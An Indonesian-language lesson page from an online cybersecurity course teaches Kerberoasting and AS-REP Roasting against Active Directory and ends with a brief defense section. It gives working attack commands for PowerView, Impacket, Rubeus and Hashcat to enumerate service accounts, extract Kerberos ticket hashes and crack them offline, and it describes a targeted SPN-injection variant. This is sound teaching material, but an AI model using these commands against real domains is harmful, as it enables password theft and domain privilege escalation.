Kerberoasting dan AS-REP Roasting
Minta tiket layanan Kerberos dan pecahkan secara luring dengan Hashcat.
Kerberoasting dan AS-REP Roasting adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 3 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Enkripsi Tiket Kerberos
Tiket layanan dienkripsi dengan hash kata sandi akun layanan. Setiap pengguna domain dapat meminta tiket layanan untuk SPN apa pun. Jika akun layanan memiliki kata sandi yang lemah, tiket tersebut dapat dipecahkan tanpa koneksi.
Apa Itu Kerberoasting
Kerberoasting meminta tiket layanan untuk akun dengan Nama Prinsipal Layanan (SPN), mengekstrak tiket yang terenkripsi, lalu memecahkannya tanpa koneksi menggunakan Hashcat. Tidak diperlukan hak istimewa yang lebih tinggi — setiap pengguna domain dapat melakukannya.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatMenemukan SPN
Enumerasikan semua akun layanan dengan SPN menggunakan PowerView, Impacket, atau alat AD bawaan. SPN menghubungkan akun layanan dengan layanannya.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalNameMeminta dan Mengekstrak Tiket
Rubeus (Windows) dan GetUserSPNs milik Impacket (Linux) sama-sama meminta tiket dan menghasilkannya dalam format yang dapat dipecahkan.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtMemecahkan dengan Hashcat
Hash Kerberoast menggunakan mode 13100 (TGS-REP Kerberos 5). Gunakan daftar kata sandi yang kuat beserta aturan untuk efektivitas maksimum.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)Apa Itu AS-REP Roasting
AS-REP Roasting menargetkan akun yang mengaktifkan opsi Tidak memerlukan prapaentikasi Kerberos. AS mengembalikan TGT yang dienkripsi dengan hash pengguna — dapat diminta tanpa mengetahui kata sandinya dan dipecahkan tanpa koneksi.
Menemukan Akun dengan Prapaentikasi Dinonaktifkan
Akun tanpa prapaentikasi merupakan salah konfigurasi yang sering ditinggalkan oleh aplikasi lama. Enumerasikan akun tersebut dengan PowerView atau GetNPUsers.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtMemecahkan Hash AS-REP
Hash AS-REP menggunakan mode Hashcat 18200. Proses pemecahannya sama seperti Kerberoasting — serangan kamus tanpa koneksi terhadap tanggapan AS yang terenkripsi.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rulePenilaian Dampak
Kata sandi akun layanan yang berhasil dipecahkan sering kali memiliki hak istimewa yang lebih tinggi — akun layanan yang menjalankan basis data, perangkat lunak pencadangan, atau Exchange mungkin merupakan administrator domain. Akun AS-REP sering terabaikan dan diamankan dengan lemah.
Kerberoasting Bertarget
Jika Anda memiliki akses tulis ke suatu objek, Anda dapat menambahkan SPN sementara ke akun bernilai tinggi, melakukan Kerberoasting terhadapnya, memecahkan hash, lalu menghapus SPN — sehingga akun tertentu dapat ditargetkan sesuai kebutuhan.
Pertahanan
Pertahanan terhadap Kerberoasting: gunakan kata sandi acak yang panjang (25+ karakter) untuk akun layanan, atau lebih baik gunakan Group Managed Service Accounts (gMSA) dengan kata sandi 120 karakter yang berputar otomatis. Untuk AS-REP: aktifkan prapaentikasi pada semua akun.
Pemeriksaan Singkat
Atribut akun apa yang diperlukan agar AS-REP Roasting dapat dilakukan?
Ringkasan: Kerberoasting dan AS-REP Roasting
Kedua serangan tersebut memanfaatkan kelemahan enkripsi tiket Kerberos untuk memecahkan kata sandi tanpa koneksi tanpa memicu penguncian akun. Kerberoasting menargetkan akun SPN (setiap pengguna domain dapat melakukannya); AS-REP Roasting menargetkan akun tanpa prapaentikasi (tidak memerlukan kredensial). Lakukan pertahanan dengan gMSA untuk akun layanan dan wajibkan prapaentikasi pada semua pengguna.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Kerberoasting dan AS-REP Roasting” gratis?
Ya — teks lengkap “Kerberoasting dan AS-REP Roasting” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Kerberoasting dan AS-REP Roasting”?
Minta tiket layanan Kerberos dan pecahkan secara luring dengan Hashcat. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 3 dari 4.
Berapa lama pelajaran “Kerberoasting dan AS-REP Roasting” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Autentikasi Windows: NTLM dan Kerberos
- Serangan Pass-the-Hash dan Pass-the-Ticket
- Kerberoasting dan AS-REP Roasting
- Penguatan Active Directory